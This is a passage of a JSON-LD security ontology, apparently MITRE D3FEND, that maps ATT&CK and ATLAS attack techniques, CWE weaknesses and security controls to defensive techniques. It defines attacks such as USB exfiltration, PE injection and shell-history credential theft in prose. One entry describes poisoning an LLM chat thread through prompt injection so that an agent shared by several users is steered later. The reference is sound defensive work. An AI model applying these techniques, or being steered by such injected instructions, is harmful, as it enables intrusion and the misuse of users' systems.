      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:narrower-transitive",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x narrower-transitive y: The entity x represents a more specific concept than entity y, including indirect or hierarchical relationships where x is a subset of y through intermediate entities.",
      "rdfs:label": "narrower-transitive",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:T1052.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1052.001",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
      "d3f:modifies": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "rdfs:label": "Exfiltration over USB",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1052"
        },
        {
          "@id": "_:N289a3da5301c40f5b4437368a0b93410"
        }
      ]
    },
    {
      "@id": "_:N289a3da5301c40f5b4437368a0b93410",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:Hybrid-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HBTL",
      "d3f:definition": "This method creates an asymmetric mapping from the target to the source and takes into account bias issues of cross-domain correspondences.",
      "d3f:kb-article": "## References\nDay, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. Journal of Big Data, 4(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Hybrid-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-1062",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1062",
      "d3f:definition": "The code has a parent class that contains references to a child class, its methods, or its members.",
      "rdfs:label": "Parent Class with References to Child Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:T0870",
      "@type": "owl:Class",
      "d3f:attack-id": "T0870",
      "d3f:definition": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Detect Program State - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Detect Program State"
    },
    {
      "@id": "d3f:T1630.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630.001",
      "d3f:definition": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:",
      "rdfs:label": "Uninstall Malicious Application - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1630"
      },
      "skos:prefLabel": "Uninstall Malicious Application"
    },
    {
      "@id": "d3f:created-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x created-by y: The entity x is brought into existence, developed, or generated by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:creates"
      },
      "rdfs:label": "created-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-created-by"
        }
      ]
    },
    {
      "@id": "d3f:CWE-535",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-535",
      "d3f:definition": "A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.",
      "rdfs:label": "Exposure of Information Through Shell Error Message",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-211"
      }
    },
    {
      "@id": "d3f:HardwareTimerConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a hardware timer's registers or operational parameters are programmed or modified.",
      "rdfs:label": "Hardware Timer Configuration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareTimerEvent"
      }
    },
    {
      "@id": "d3f:AML.T0003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0003",
      "d3f:definition": "Adversaries may search websites owned by the victim for information that can be used during targeting.\nVictim-owned websites may contain technical details about their AI-enabled products or services.\nVictim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info.\nThese sites may also have details highlighting business operations and relationships.\n\nAdversaries may search victim-owned websites to gather actionable information.\nThis information may help adversaries tailor their attacks (e.g. [Adversarial AI Attacks](/techniques/AML.T0017.000) or [Manual Modification](/techniques/AML.T0043.003)).\nInformation from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search Open Technical Databases](/techniques/AML.T0000) or [Search Open AI Vulnerability Analysis](/techniques/AML.T0001))",
      "rdfs:label": "Search Victim-Owned Websites - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Victim-Owned Websites"
    },
    {
      "@id": "d3f:CWE-32",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-32",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '...' (triple dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '...' (Triple Dot)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:Partition",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A partition is a region on secondary storage device created so that the region can be managed by itself; separate from any other regions (partitions) on that secondary storage device. Creating partitions is typically the first step of preparing a newly installed storage device, before any file system is created. The device stores the information about the partitions' locations and sizes in an area known as the partition table that the operating system reads before any other part of the disk. Each partition then appears to the operating system as a distinct \"logical\" storage device that uses part of the actual device. System administrators use a program called a partition editor to create, resize, delete, and manipulate the partitions. Partitioning allows the use of different filesystems to be installed for different kinds of files. Separating user data from system data can prevent the system partition from becoming full and rendering the system unusable. Partitioning can also make backing up easier. [Definition adapted as generalization from definition of disk partitioning and distinct from in-memory partitions.]",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Disk_partitioning"
      },
      "rdfs:label": "Partition",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Partition_table"
        },
        {
          "@id": "dbr:Memory_management_(operating_systems)"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "Disk Partition",
        "Disk Slice"
      ]
    },
    {
      "@id": "d3f:Reference-SuspiciousArguments_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-07-001/"
      },
      "d3f:kb-abstract": "Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-07-001: Suspicious Arguments",
      "rdfs:label": "Reference - CAR-2013-07-001: Suspicious Arguments - MITRE"
    },
    {
      "@id": "d3f:T1055.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.002",
      "d3f:definition": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:may-add": {
        "@id": "d3f:ObjectFile"
      },
      "rdfs:label": "Portable Executable Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N1d13c70ac06444f49ec61274471b6cb8"
        }
      ]
    },
    {
      "@id": "_:N1d13c70ac06444f49ec61274471b6cb8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ObjectFile"
      }
    },
    {
      "@id": "d3f:MultimediaFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DigitalMultimedia"
      },
      "d3f:definition": "A file that contains digital multimedia.",
      "rdfs:label": "Multimedia File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N55d53a4624434dcaa1ace9781df8aa07"
        }
      ]
    },
    {
      "@id": "_:N55d53a4624434dcaa1ace9781df8aa07",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMultimedia"
      }
    },
    {
      "@id": "d3f:CWE-645",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-645",
      "d3f:definition": "The product contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out.",
      "rdfs:label": "Overly Restrictive Account Lockout Mechanism",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-287"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForControllingCommunicationPorts",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8566924"
      },
      "d3f:kb-abstract": "A method for limiting devices and controlling the applications executed from USB ports on personal computers (PCs).",
      "d3f:kb-author": "Steven V Bacastow",
      "d3f:kb-organization": "OL Security LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:kb-reference-title": "Method and system for controlling communication ports",
      "rdfs:label": "Reference - Method and system for controlling communication ports"
    },
    {
      "@id": "d3f:T1598.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.003",
      "d3f:definition": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
      "rdfs:label": "Spearphishing Link",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:CCI-001684_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account modification actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001684"
    },
    {
      "@id": "d3f:DE-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0004",
      "d3f:definition": "The adversary presents themselves as an authorized origin so activity appears legitimate across RF, protocol, and organizational boundaries. Techniques include crafting telecommand frames with correct headers, counters, and dictionaries; imitating station “fingerprints” such as Doppler, polarization, timing, and framing; replaying or emulating crosslink identities; and using insider-derived credentials or roles to operate mission tooling. Masquerading can also target metadata, virtual channel IDs, APIDs, source sequence counts, and facility identifiers, so logs and telemetry attribute actions to expected entities. The effect is that commands, file transfers, or configuration changes are processed as if they came from approved sources, reducing scrutiny and delaying detection.",
      "rdfs:label": "Masquerading - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:T1218.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.004",
      "d3f:definition": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and <code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>.",
      "rdfs:label": "InstallUtil",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:CWE-102",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-102",
      "d3f:definition": "The product uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect.",
      "rdfs:label": "Struts: Duplicate Validation Forms",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1173"
        },
        {
          "@id": "d3f:CWE-694"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001936_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for network access to privileged accounts such that one of the factors is provided by a device separate from the system gaining access.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001936"
    },
    {
      "@id": "d3f:CWE-468",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-468",
      "d3f:definition": "In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled.",
      "rdfs:label": "Incorrect Pointer Scaling",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:T1552.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CommandHistoryLogFile"
      },
      "d3f:attack-id": "T1552.003",
      "d3f:definition": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)",
      "rdfs:label": "Shell History",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N23723f0e48b84db8b836abf98a9941e9"
        }
      ]
    },
    {
      "@id": "_:N23723f0e48b84db8b836abf98a9941e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLogFile"
      }
    },
    {
      "@id": "d3f:DefaultUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.",
      "rdfs:label": "Default User Account",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-000057_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system initiates a session lock after the organization-defined time period of inactivity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000057"
    },
    {
      "@id": "d3f:AML.T0091",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0091",
      "d3f:definition": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.\n\nAI services commonly use alternate authentication material as a primary means for users to make queries, making them vulnerable to this technique.",
      "rdfs:label": "Use Alternate Authentication Material - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0091"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASLateralMovementTechnique"
      },
      "skos:prefLabel": "Use Alternate Authentication Material"
    },
    {
      "@id": "dcterms:title",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:T1471",
      "@type": "owl:Class",
      "d3f:attack-id": "T1471",
      "d3f:definition": "An adversary may encrypt files stored on a mobile device to prevent the user from accessing them. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.",
      "rdfs:label": "Data Encrypted for Impact - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Data Encrypted for Impact"
    },
    {
      "@id": "d3f:BootLoader",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A bootloader is software that is responsible for booting a computer. When a computer is turned off, its software‍-‌including operating systems, application code, and data‍-‌remains stored on non-volatile memory. When the computer is powered on, it typically does not have an operating system or its loader in random-access memory (RAM). The computer first executes a relatively small program stored in read-only memory (ROM, and later EEPROM, NOR flash) along with some needed data, to initialize RAM (especially on x86 systems) to access the nonvolatile device (usually block device, eg NAND flash) or devices from which the operating system programs and data can be loaded into RAM.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Bootloader"
      },
      "rdfs:label": "Boot Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      },
      "skos:altLabel": "Bootloader"
    },
    {
      "@id": "d3f:RTCUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a Real-Time Clock's stored time value is read from or written to its battery-backed storage.",
      "rdfs:label": "RTC Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareClockEvent"
        },
        {
          "@id": "_:Ne5fe3a089fbb4e259e85d33c7de3a95c"
        }
      ]
    },
    {
      "@id": "_:Ne5fe3a089fbb4e259e85d33c7de3a95c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RealtimeClock"
      }
    },
    {
      "@id": "d3f:PrintServer",
      "@type": "owl:Class",
      "d3f:definition": "A print server, or printer server, is a device that connects printers to client computers over a network. It accepts print jobs from the computers and sends the jobs to the appropriate printers, queuing the jobs locally to accommodate the fact that work may arrive more quickly than the printer can actually handle.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Print_server"
      },
      "rdfs:label": "Print Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:EventLogExportEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the export of event log data to a file or external system for backup or analysis purposes.",
      "rdfs:label": "Event Log Export Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:CCI-001403_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account modification actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001403"
    },
    {
      "@id": "d3f:AML.T0080.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0080.001",
      "d3f:definition": "Adversaries may introduce malicious instructions into a chat thread of a large language model (LLM) to cause behavior changes which persist for the remainder of the thread. A chat thread may continue for an extended period over multiple sessions.\n\nThe malicious instructions may be introduced via Direct or Indirect Prompt Injection. Direct Injection may occur in cases where the adversary has acquired a user's LLM API keys and can inject queries directly into any thread.\n\nAs the token limits for LLMs rise, AI systems can make use of larger context windows which allow malicious instructions to persist longer in a thread.\nThread Poisoning may affect multiple users if the LLM is being used in a service with shared threads. For example, if an agent is active in a Slack channel with multiple participants, a single malicious message from one user can influence the agent's behavior in future interactions with others.",
      "rdfs:label": "Thread - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0080.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0080"
      },
      "skos:prefLabel": "Thread"
    },
    {
      "@id": "d3f:CWE-400",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-400",
      "d3f:definition": "The product does not properly control the allocation and maintenance of a limited resource.",
      "d3f:synonym": "Resource Exhaustion",
      "rdfs:label": "Uncontrolled Resource Consumption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Hardware Integrity Verification",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:FirmwareVerification"
      },
      "rdfs:label": "SA-10(3)"
    },
    {
      "@id": "d3f:Identifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An identifier is a name that identifies (that is, labels the identity of) either a unique object or a unique class of objects, where the \"object\" or class may be an idea, physical [countable] object (or class thereof), or physical [noncountable] substance (or class thereof). The abbreviation ID often refers to identity, identification (the process of identifying), or an identifier (that is, an instance of identification). An identifier may be a word, number, letter, symbol, or any combination of those.",
      "d3f:identifies": {
        "@id": "d3f:Artifact"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Identifier"
      },
      "rdfs:label": "Identifier",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Nf6ac6158aaa44061a8412140e25e7fe6"
        }
      ],
      "skos:altLabel": "ID"
    },
    {
      "@id": "_:Nf6ac6158aaa44061a8412140e25e7fe6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "d3f:process-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-data-property y: The process x has the data property y.",
      "rdfs:label": "process-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-artifact-data-property"
      }
    },
    {
      "@id": "d3f:CWE-649",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-649",
      "d3f:definition": "The product uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the product does not use integrity checks to detect if those inputs have been modified.",
      "rdfs:label": "Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:ConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that changes the persisted state of configuration resources by adding, updating, or removing parameters, impacting the target component's behavior.",
      "rdfs:label": "Configuration Modification Event",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationEvent"
      }
    },
    {
      "@id": "d3f:T1069.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069.001",
      "d3f:definition": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.",
      "rdfs:label": "Local Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1069"
      }
    },
    {
      "@id": "d3f:AML.T0013",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0013",
      "d3f:definition": "Adversaries may discover the ontology of an AI model's output space, for example, the types of objects a model can detect.\nThe adversary may discovery the ontology by repeated queries to the model, forcing it to enumerate its output space.\nOr the ontology may be discovered in a configuration file or in documentation about the model.\n\nThe model ontology helps the adversary understand how the model is being used by the victim.\nIt is useful to the adversary in creating targeted attacks.",
      "rdfs:label": "Discover AI Model Ontology - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0013"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Model Ontology"
    },
    {
      "@id": "d3f:CCI-002302_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined techniques or technologies with an organization-defined level of assurance in associating security attributes to information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002302"
    },
    {
      "@id": "d3f:UserGeolocationLogonPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserGeolocationLogonPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-UGLPA",
      "d3f:definition": "Monitoring geolocation data of user logon attempts and comparing it to a baseline user behavior profile to identify anomalies in logon location.",
      "d3f:kb-article": "## How it works\nGeolocation data for each user logon attempt is collected and used to create a baseline user behavior profile. Current geolocation logon data is then compared against the user behavior profile. Logon activity that deviates from normal patterns and can help in identifying situations that may be indicative of a remote attacker using stolen credentials. For example:\n\n* logons from locations that are different from where a user usually logs in\n* logons from a location in which an enterprise has no users located\n* logon that is not physically possible given the elapsed time since a logon from another location.\n\n## Considerations\n* Potential for false positives from logon anomalies that are not associated with malicious activity.\n* Attackers may not differentiate their logon behavior enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "User Geolocation Logon Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N4a2e923c265442e0bb297fd979b2dbd9"
        }
      ]
    },
    {
      "@id": "_:N4a2e923c265442e0bb297fd979b2dbd9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:DS0005",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers",
      "rdfs:comment": "This data source captures events relating to WMI objects and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "WMI (ATT&CK DS)"
    },
    {
      "@id": "d3f:MediaServer",
      "@type": "owl:Class",
      "d3f:definition": "A media server is a computer appliance or an application software that stores digital media (video, audio or images) and makes it available over a network. Media servers range from servers that provide video on demand to smaller personal computers or NAS (Network Attached Storage) for the home.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Media_server"
      },
      "rdfs:label": "Media Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:T1066",
      "@type": "owl:Class",
      "d3f:attack-id": "T1066",
      "d3f:definition": "If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.005",
      "rdfs:label": "Indicator Removal from Tools",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1102.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1102.002",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.",
      "rdfs:label": "Bidirectional Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1102"
      }
    },
    {
      "@id": "d3f:ServiceDisableEvent",
      "@type": "owl:Class",
